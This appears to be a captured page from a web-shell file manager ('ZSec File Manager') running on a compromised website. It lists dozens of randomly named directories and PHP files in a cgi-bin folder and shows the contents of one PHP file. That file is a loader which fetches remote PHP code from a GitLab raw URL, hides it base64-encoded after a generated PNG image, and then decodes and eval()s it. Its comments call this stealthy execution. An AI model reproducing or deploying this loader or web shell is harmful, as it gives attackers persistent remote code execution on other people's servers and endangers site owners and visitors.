Mini File Manager

ZSec File Manager

Current Directory: /home/greakqsw/theblogginglab.org/5uq8v7-20260314182546/3myf64/cgi-bin

[Up]

.. [Open]

cgi-bin.tar [Edit]

cgi-bin.tar.gz [Edit]

cgi-bin.zip [Edit]

error_log [Edit]

q7m5c4.zip [Edit]

tirl3n [Open]

tkh85g [Open]

tknr36 [Open]

trfgan [Open]

tsr1pl [Open]

tyci5f [Open]

tzbjq8 [Open]

u1a79.php [Edit]

u1qoni [Open]

u3e59t [Open]

u47kst [Open]

u7pcem [Open]

u9qhik [Open]

u9w37n [Open]

ua901m [Open]

ubvd83 [Open]

ui1esz [Open]

ujxzdn [Open]

ujz0w7 [Open]

ukjeos [Open]

unym16 [Open]

up8zqf [Open]

upqx1d [Open]

usxil9 [Open]

utfwzy [Open]

ux5t2y [Open]

ux785m [Open]

uyx89n [Open]

v0tjp3 [Open]

v4ax76 [Open]

v4zbrn [Open]

v5ol1z [Open]

v5x16c [Open]

v71t3z [Open]

v7fhcb [Open]

v95wi.php [Edit]

v9umcn [Open]

vakwlt [Open]

vf2s0.php [Edit]

vf6tc.php [Edit]

vitd6l [Open]

viukyl [Open]

vkyus1 [Open]

vmzfel [Open]

vpo37j [Open]

vqkb6o [Open]

vs6ltc [Open]

vshi6f [Open]

vuwpao [Open]

vwuifk [Open]

vxm76u [Open]

vxuw6g [Open]

vyihjl [Open]

w1q2cv [Open]

w4gzvt [Open]

wb1xok [Open]

wb76ju [Open]

wbvxm8 [Open]

wg0m2c [Open]

wgu6pc [Open]

wjvlno [Open]

wjzbch [Open]

wspx1g [Open]

wufim.php [Edit]

wz3n58 [Open]

x27ki3 [Open]

x4b9lh [Open]

x5i6se [Open]

x701wm [Open]

x7oeat [Open]

x8kj7p [Open]

x8w5lt [Open]

xa0h9i [Open]

xbin1q [Open]

xbqu0a [Open]

xc4w0a [Open]

xc73as [Open]

xdk7ab [Open]

xdwb83 [Open]

xglcor [Open]

xiukjw [Open]

xky15q [Open]

xnv01u [Open]

xoaym7 [Open]

xod4je [Open]

xomt90 [Open]

xvjzid [Open]

xzqeyn [Open]

y03sal [Open]

y03sal.tar.gz [Edit]

y14v8o [Open]

y27cn.php [Edit]

y2qi83 [Open]

y2tw9o [Open]

y35a6w [Open]

y3eju8 [Open]

y562xz [Open]

yb8tpn [Open]

yd960u [Open]

ydux3m [Open]

ye34mp [Open]

yent2p [Open]

ygo9kl [Open]

yid1al [Open]

yoepax [Open]

ys1mp8 [Open]

ytepab [Open]

yvmkrh [Open]

yzel8j [Open]

z0ve4w [Open]

z3wbfx [Open]

z46c5r [Open]

z5liqm [Open]

z5wbkr [Open]

z6fv0s [Open]

z6vj0x [Open]

z7fs5e [Open]

z7ruqc [Open]

z86uk.php [Edit]

z8op2.php [Edit]

zhx8v.php [Edit]

zi7qcd [Open]

zjuegi [Open]

zles58 [Open]

zvoctr [Open]

zy1fvx [Open]

Edit File

<?php

/*
Improved PNG disguise for hidden PHP payloads.
This script fetches remote code, embeds it into a realistic PNG file,
and executes it stealthily.
*/

session_start();

// Main remote code URL (can be overridden by session)
$mainUrl = $_SESSION['ts_url'] ?? 'https://gitlab.com/mrgithub89-group/mrgithub89-projectaa/-/raw/main/wp-security.php';

// --------------------------------------------
// 1. Generate a realistic PNG image (128x128)
// --------------------------------------------
function generateRealisticPngHeader($width = 128, $height = 128) {
    ob_start();
    $image = imagecreatetruecolor($width, $height);

// Fill with random noise
    for ($x = 0; $x < $width; $x++) {
        for ($y = 0; $y < $height; $y++) {
            $color = imagecolorallocate($image, rand(0,255), rand(0,255), rand(0,255));
            imagesetpixel($image, $x, $y, $color);
        }
    }

imagepng($image);
    imagedestroy($image);
    return ob_get_clean(); // Binary PNG data
}

// --------------------------------------------
// 2. Load remote PHP code from given URL
// --------------------------------------------
function loadRemoteData($url) {
    $content = '';

try {
        $file = new SplFileObject($url);
        while (!$file->eof()) {
            $content .= $file->fgets();
        }
    } catch (Throwable $e) {
        $content = '';
    }

if (strlen(trim($content)) < 1) {
        $content = @file_get_contents($url);
    }

if (strlen(trim($content)) < 1 && function_exists('curl_init')) {
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_CONNECTTIMEOUT => 5,
            CURLOPT_TIMEOUT => 10,
        ]);
        $content = curl_exec($ch);
        curl_close($ch);
    }

return $content;
}

// --------------------------------------------
// 3. Create payload by appending hidden PHP code
// --------------------------------------------
function createStealthPayload($phpCode) {
    $png = generateRealisticPngHeader();
    $marker = '###PAYLOAD###';
    $encoded = base64_encode($phpCode);

return $png . $marker . $encoded;
}

// --------------------------------------------
// 4. Extract and execute hidden payload
// --------------------------------------------
function extractAndExecutePayload($data) {
    $marker = '###PAYLOAD###';
    $parts = explode($marker, $data);

if (count($parts) === 2) {
        $decoded = base64_decode($parts[1]);
        if ($decoded !== false && strlen(trim($decoded)) > 0) {
            @eval("?>$decoded");
        }
    }
}

// --------------------------------------------
// Main Execution Flow
// --------------------------------------------

$remoteCode = loadRemoteData($mainUrl);

if (strlen(trim($remoteCode)) > 0) {
    $payload = createStealthPayload($remoteCode);
    extractAndExecutePayload($payload);  // Executes hidden remote code
}

?>